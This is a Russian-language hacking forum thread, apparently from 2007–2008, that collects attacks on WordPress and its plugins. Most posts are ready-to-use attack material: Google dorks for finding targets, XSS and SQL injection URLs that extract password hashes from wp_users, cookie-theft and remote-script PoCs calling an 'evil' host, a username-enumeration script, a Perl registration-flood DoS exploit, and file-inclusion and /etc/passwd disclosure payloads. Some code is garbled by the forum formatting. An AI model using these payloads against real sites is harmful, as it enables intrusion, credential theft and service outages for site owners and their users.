[ Обзор уязвимостей WordPress ]

Обсуждение в разделе «Сценарии/CMF/СMS», начал(-а) ettee, 5.10.2007.

  1. ettee

    ettee Administrator
    Администрация

    Регистрация:
    12.10.2006
    Сообщения:
    465
    Одобрения:
    1 028
    Репутация:
    668
    Vulnerabilities:

    Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

    Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

    Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

    1.4*
    Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

    Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

    Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability


    1.5.1.*
    Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

    Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

    Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

    WordPress <= 1.5.1.1 SQL Injection Exploit

    WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

    2.0.*
    WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

    Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

    Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

    2.1.*
    Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

    Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

    2.*
    Wordpress <= 2.x dictionnary & Bruteforce attack

    WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

    Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit


    dork:
    Code:
    "is proudly powered by WordPress"
    intext:"Warning: main" inurl:Wp ext:php
    inurl:wp-login.php Register Username Password -echo -trac
    inurl:"wp-admin" config -cvs -phpxref
    inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
    Powered by Wordpress 1.2
    intext:"proudly powered by WordPress" filetype:php
    intext:"powered by WordPress" filetype:php -dritte-seite
    intitle:"WordPress > * > Login form" inurl:"wp-login.php" 
    ext:php inurl:"wp-login.php" -cvs

    Full path disclosure:


    WordPress < 1.5.2

    Cross-site Scripting:
    /wp-login.php?action=login&redirect_to=[XSS]
    /wp-admin/templates.php?file=[XSS]
    /wp-admin/post.php?content=[XSS]
    http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
    http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
    http://www.example.com/wp-admin/templates.php?file=[XSS]
    http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
    http://www.example.com/wp-admin/link-add.php?name=[XSS]
    http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
    http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
    http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
    http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
    http://www.example.com/wp-admin/post.php?content=[XSS]
    http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

    SQL injection examples:
    http://www.example.com/index.php?m=[SQL]
    http://www.example.com/wp-admin/edit.php?m=[SQL]
    http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
    http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

    Tables/Prefix_/Columns:
    wp_

    Hash algorithms:
    md5(password)

    WordPress Vulnerability Scanner
    Code:
    $ perl -x wp-scanner.pl http://testblog/wordpress/
    
    WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)
    
    Using plugins dir: wp-content/plugins
    
    [*] Initial WordPress Enumeration
    [*] Finding WordPress Major Version
    [*] Testing WordPress Template for XSS
    
    WordPress Basic Results
    
            wp-commentsrss2.php =>  Version Leak: WordPress 2.1.3
            wp-links-opml.php =>    Version Leak: WordPress 2.1.3
            wp-major-ver => Version 2.1
            wp-rdf.php =>   Version Leak: WordPress 2.1.3
            wp-rss.php =>   Version Leak: WordPress 2.1.3
            wp-rss2.php =>  Version Leak: WordPress 2.1.3
            wp-server =>    Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
            wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
            wp-title => Test Blog
            wp-version =>   WordPress 2.1.3
            x-Pingback =>   http://testblog/wordpress/xmlrpc.php
    
    WordPress Plugins Found
    
            wp-plugins[0]    => Akismet
    
    Download
     
    #1 ettee, 5.10.2007
    В последний раз редактировалось: 10.12.2007
    Это одобряют 13 пользоветелей.
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    WordPress Scanner v1.3b BETA

    http://blogsecurity.net/cgi-bin/wp-scanner.cgi
    http://blogsecurity.net/projects/wp-scanner.zip
     
    #2 +toxa+, 5.10.2007
    В последний раз редактировалось: 5.10.2007
    Это одобряют 2 пользоветелей.
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    WordPress <=2.0.4 XSS

    simple PoC:
    HTML:
    <html>
    <head></head>
    <body>
    
    <form method="post" action="http://target/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login"
    value='"><script>alert(1)</script>' />
    <input type="hidden" name="user_email" id="user_email"
    value='"><script>alert(2)</script>' />
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
    cookie theft PoC:

    HTML:
    <html>
    <head></head>
    <body>
    
    <form method="post"
    action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
    >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="anyusername" />
    <input type="hidden" name="user_email" id="user_email"
    value='"><script>eval(location.hash.substr(1))</script>' />
    
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
    unrestricted script insertion from third-party site

    (we prove we can
    inject ANY JS):

    HTML:
    <html>
    <head></head>
    <body>
    
    <form method="post" action="http://victim/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="test" />
    <input type="hidden" name="user_email" id="user_email"
    value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
     
    Это одобряют 3 пользоветелей.
  4. Solide Snake

    Solide Snake Banned

    Регистрация:
    28.04.2007
    Сообщения:
    473
    Одобрения:
    841
    Репутация:
    80
    07 июня, 2007
    Программа: WordPress 2.2, возможно более ранние версии

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST
    Вот пример запроса
    HTML:
    <methodCall>
    <methodName>wp.suggestCategories</methodName>
    <params>
    <param><value>1</value></param>
    <param><value>Здесь логин</value></param>
    <param><value>Сдесь пароль</value></param>
    <param><value>1</value></param>
    <param><value>0 UNION SELECT USER()</value></param>
    </params>
    </methodCall>
     
    #4 Solide Snake, 5.10.2007
    В последний раз редактировалось модератором: 20.05.2008
    Это одобряют 3 пользоветелей.
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    Wordpress 2.2 Username Enumeration

    PHP:
    #!/bin/bash

    # this script attacks a low-risk username enumeration vul
    # on Wordpress 2.2 login page. Previous versions are
    # possibly affected as well
    #
    # Note: you need curl [http://curl.haxx.se/download.html]
    # installed on your system for this script to work.
    #
    # Adrian Pastor - http://www.gnucitizen.org/

    if [ $# -ne 2 ]
    then
           
    echo "need to parameters! correct syntax is:"
           
    echo "$0 <ip-or-hostname> <wordlist-filename>"
           
    exit 1
    fi


    for U in `cat $2`
    do
           
    #echo $U

           
    if curl --d
    "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url
    "http://$1/wordpress/wp-login.php" grep -'Incorrect password' >
    /
    dev/null
           then
                   
    echo "username found!: $U# print username found on screen
                   
    echo $U >> $0.found # save results to file equals to
    script name plus .found extension
           fi
    done
     
    Это одобряют 2 пользоветелей.
  6. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    WordPress Security Whitepaper

    http://blogsecurity.net/projects/secure-wp-whitepaper.pdf

    &&

    Writing Secure WordPress Plugins
    http://michaeldaw.org/papers/securing_wp_plugins/
     
    #6 +toxa+, 5.10.2007
    В последний раз редактировалось: 5.10.2007
    Это одобряют 4 пользоветелей.
  7. ettee

    ettee Administrator
    Администрация

    Регистрация:
    12.10.2006
    Сообщения:
    465
    Одобрения:
    1 028
    Репутация:
    668
    WordPress PHP_Self Cross-Site Scripting Vulnerability
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">	
    <head>
    	<title>Wordpress XSS PoC</title>
    </head>
    <body id="main">
    
    	<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
    		<p>
    			<textarea name="newcontent" rows="8" cols="40">&lt;?php echo "Owned! " . date('F d, Y'); ?&gt;</textarea>
    		</p>
    		<p>
    			<input type="hidden" name="action" value="update" />
    			<input type="hidden" name="file" value="wp-content/themes/default/index.php" />		
    		</p>
    	</form>	
    	<script type="text/javascript">
    	// <![CDATA[
    		document.forms[0].submit();
    	// ]]>
    	</script>
    </body>
    </html>
    
    Vulnerable URI:
    Code:
    /wp-admin/plugins.php?page=akismet-key-config
    Vulnerable Post variable:
    Code:
    _wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
    by 0x000000
     
    #7 ettee, 5.10.2007
    В последний раз редактировалось: 10.12.2007
    Это одобряют 2 пользоветелей.
  8. Fugitif

    Fugitif Elder - Старейшина

    Регистрация:
    23.09.2007
    Сообщения:
    409
    Одобрения:
    227
    Репутация:
    36
    Это одобряют 2 пользоветелей.
  9. Solide Snake

    Solide Snake Banned

    Регистрация:
    28.04.2007
    Сообщения:
    473
    Одобрения:
    841
    Репутация:
    80
    Перебор паролей для версии Wordpress 2.x на Python тут.
     
    Это одобряют 3 пользоветелей.
  10. ettee

    ettee Administrator
    Администрация

    Регистрация:
    12.10.2006
    Сообщения:
    465
    Одобрения:
    1 028
    Репутация:
    668
    runPHP Plugin
    /wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0


    WP <2.3
    http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>


    WordPress 2.0.1 Remote DoS Exploit
    Code:
    #!perl 
    #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
    #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed 
    use Socket;
    if (@ARGV < 2) { &usage; }
    $rand=rand(10); 
    $host = $ARGV[0];
    $dir = $ARGV[1]; 
    $host =~ s/(http:\/\/)//eg; #no http://
    for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
    { 
    $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S ! 
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len = length $data; 
    $foo = "POST   ".$dir."wp-register.php HTTP/1.1\r\n". 
                   "Accept: */*\r\n".
                   "Accept-Language: en-gb\r\n".
                   "Content-Type: application/x-www-form-urlencoded\r\n".
                   "Accept-Encoding: gzip, deflate\r\n". 
                   "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
                   "Host: $host\r\n".
                   "Content-Length: $len\r\n".
                   "Connection: Keep-Alive\r\n". 
                   "Cache-Control: no-cache\r\n\r\n".
     "$data";
         my $port = "80";
         my $proto = getprotobyname('tcp');
         socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
         connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
         send(SOCKET,"$foo", 0); 
         syswrite STDOUT, "+"; 
    } 
    #s33 if the server is down
    print "\n\n";
    system('ping $host');
    sub usage {
    print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 <host> </dir/>\n"; 
    print "\tex: $0 127.0.0.1 /wordpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
    };
    
     
    #10 ettee, 6.10.2007
    В последний раз редактировалось модератором: 24.01.2008
    Это одобряет 1 пользователь.
  11. The_HuliGun

    The_HuliGun Elder - Старейшина

    Регистрация:
    19.05.2007
    Сообщения:
    210
    Одобрения:
    84
    Репутация:
    10
    Раскрытие Пути
    Code:
    http://[target]/[path]/wp-content/plugins/akismet/akismet.php
    
     
    Это одобряют 4 пользоветелей.
  12. Solide Snake

    Solide Snake Banned

    Регистрация:
    28.04.2007
    Сообщения:
    473
    Одобрения:
    841
    Репутация:
    80
    Это одобряют 2 пользоветелей.
  13. Fugitif

    Fugitif Elder - Старейшина

    Регистрация:
    23.09.2007
    Сообщения:
    409
    Одобрения:
    227
    Репутация:
    36
    WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability

    Code:
    #Author: S.W.A.T.
    
    
    #cont@ct: svvateam@yahoo.com
    
    --------------------------------------------------------------------------------
    
    
    ------------------------- -------------------------------------------------------
    
    Application :  BackUpWordPress 0.4.2b
    
    Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip
    
    --------------------------------------------------------------------------------
    Vuln :
    
    require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
    
    --------------------------------------------------------------------------------
    
    Exploit:
    
    http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
    
    http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
    
    http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
    
    http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
    
    & other Files & Folders In The [Archive] Folder
    
    --------------------------------------------------------------------------------
    
    Dork:
    
    "inurl:/plugins/BackUp"
    

    Mirror:

    http://www.milw0rm.com/exploits/4593
     
    Это одобряют 2 пользоветелей.
  14. Fugitif

    Fugitif Elder - Старейшина

    Регистрация:
    23.09.2007
    Сообщения:
    409
    Одобрения:
    227
    Репутация:
    36
    Sql Injection in wordpress 2.3.1

    Sql Injection in wordpress 2.3.1


    Code:
    Author : Beenu Arora
    
    Mail : beenudel1986 (at) gmail (dot) com [email concealed]
    
    Application : WordPress (2.3.1)
    
    Homepage: http://wordpress.org/
    
    ~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
    
    Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
    
    Parameter : P
    
    POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
    /concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
    /**/user_id=1/*

    Code:
    http://www.securityfocus.com/archive/1/484608
     
    Это одобряет 1 пользователь.
  15. Solide Snake

    Solide Snake Banned

    Регистрация:
    28.04.2007
    Сообщения:
    473
    Одобрения:
    841
    Репутация:
    80
    Это одобряют 2 пользоветелей.
  16. Fugitif

    Fugitif Elder - Старейшина

    Регистрация:
    23.09.2007
    Сообщения:
    409
    Одобрения:
    227
    Репутация:
    36
    WordPress Charset SQL Injection Vulnerability

    WordPress Charset SQL Injection Vulnerability

    Недостаточная фильтрация при GBK-кодировке базы приводит к SQL-injection.
    ( Статья описания уязвимости на Античате: https://forum.antichat.ru/thread62109.html )


    Exploit:
    http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

    _http://ilia.ws/archives/103-mysql_real_escape_string-
    versus-Prepared-Statements.html

    Code:
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    === WordPress Charset SQL Injection Vulnerability ===
    
    Release date: 2007-12-10
    Last modified: 2007-12-10
    Source: Abel Cheung
    Affected version: WordPress escape($gpc);
    }
    
    
      Finally, escape() method belongs to wp-includes/wp-db.php:
    
    function escape($string) {
      return addslashes( $string ); // Disable rest for now, causing problems
      ......
    }
    
    
    3. Proof of concept
    
      a. After WordPress installation, modify wp-config.php to make sure
         it uses certain character set for database connection (Big5 can
    also be used):
         define('DB_CHARSET', 'GBK');
    
      b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
    
    
    4. Workaround
    
      Note: This vulnerability only exists for database queries performed
      using certain character sets. For databases created in most other
      character sets no remedy is needed.
    
      a. It is recommended to convert WordPress database to use character sets not
         vulnerable to such SQL exploit. One such charset is UTF-8, which does not
         use backslash ('\') as part of character and it supports various languages.
      b. Alternatively, edit WordPress theme to remove search capability.
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.6 (GNU/Linux)
    Comment: http://firegpg.tuxfamily.org
    
    iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
    5RKJG+zo/mktmRU3v1IfmXE=
    =2okr
    -----END PGP SIGNATURE-----
    
     
    #16 Fugitif, 11.12.2007
    В последний раз редактировалось модератором: 2.05.2008
    Это одобряет 1 пользователь.
  17. Fugitif

    Fugitif Elder - Старейшина

    Регистрация:
    23.09.2007
    Сообщения:
    409
    Одобрения:
    227
    Репутация:
    36
    Wordpress 2.3.1 - Broken Access Control is_admin()

    Получение админских привелегий в обход пароля.

    Как юзать: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63

    Code:
    By Michael Brooks
    
    Vulnerability:Broken Access Control
    
    Homepage:http://wordpress.org/download
    
    Software: Wordpress
    
    Version affected:2.3.1 (Latest at the time of writing)
    
    
    
    The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.
    
    
    
    This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws. Although an attacher shouldn't be able to control all $_SERVER variables, none of them should be trusted.
    
    
    
    exploit:
    
    htttp://localhost/wordpress/'wp-admin/
    
    
    This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
    htttp://localhost/wordpress/'wp-admin/
    
    
    Vulnerable function:
    
    line 34, in ./wp-includes/query.php.
    
    function is_admin () {
    
    global $wp_query;
    
    
    
    return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
    
    }
    
    The same flaw is duplicted in again on line 645 of the same file.
    
    
    
    This url: htttp://localhost/wordpress/'wp-admin/
    will cause the is_admin() function to return true. This flaw works regardless of register_globas or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.
     
    #17 Fugitif, 16.12.2007
    В последний раз редактировалось модератором: 13.06.2008
  18. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability

    Code:
    Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
    D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
    Vuln Code :
    In Line 5,6,7,8 :
        $path = $_GET['path'];
        $size = $_GET['size'];
        $base = dirname(__FILE__) . "/..";
        $cache = "$base/cache/$size/$path";
    In Line 22 :
        readfile($cache);
    POC :
        /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
    
    # milw0rm.com [2007-12-05]
     
    Это одобряют 2 пользоветелей.
  19. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    XSS in WP-ContactForm <= 2.0.7

    For attacking admin only (at options page):

    1
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    2
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    3
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    4
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
    </form>
    </body>
    </html>
    
    =====
    For attacking every user of the site (at contact page):

    5
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <body>
    <iframe src="http://site/contact/" width="0" height="0"></iframe>
    </form>
    </body>
    </html>
    
    ======
    For attacking every user of the site at contact page (and admin at options page):

    6
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    7
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    ======
    For attacking every user of the site (at contact page):

    8
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_answer" value="4" />
    <input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/contact/" method="post">
    <input type="hidden" name="wpcf_stage" value="process" />
    <input type="hidden" name="wpcf_your_name" value="test" />
    <input type="hidden" name="wpcf_email" value="test@test.test" />
    <input type="hidden" name="wpcf_response" value="4" />
    <input type="hidden" name="wpcf_msg" value="XSS" />
    </form>
    </form>
    </body>
    </html>
    
    9
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
    <input type="hidden" name="stage" value="process" />
    <input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
    </form>
    </body>
    </html>
    
    HTML:
    <html>
    <head>
    <title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
    </head>
    <!-- <body onLoad="document.hack.submit()"> -->
    <body>
    <form name="hack" action="http://site/contact/" method="post">
    <input type="hidden" name="wpcf_stage" value="process" />
    <input type="hidden" name="wpcf_msg" value="XSS" />
    </form>
    </form>
    </body>
    </html>
    
     
    #19 +toxa+, 25.12.2007
    В последний раз редактировалось: 25.12.2007
    Это одобряет 1 пользователь.
  20. +toxa+

    +toxa+ Smack! SMACK!!!

    Регистрация:
    16.01.2005
    Сообщения:
    1 703
    Одобрения:
    1 027
    Репутация:
    730
    directory traversal vulnerabilities in WP 2.0.11(win only)

    PHP:
    function validate_file(..)
    if (
    false !== strpos($file./))
    Code:
    Proof of concept:
    http://site/wp-admin/index.php?page=\..\..\.htaccess
     
    Это одобряет 1 пользователь.
Loading...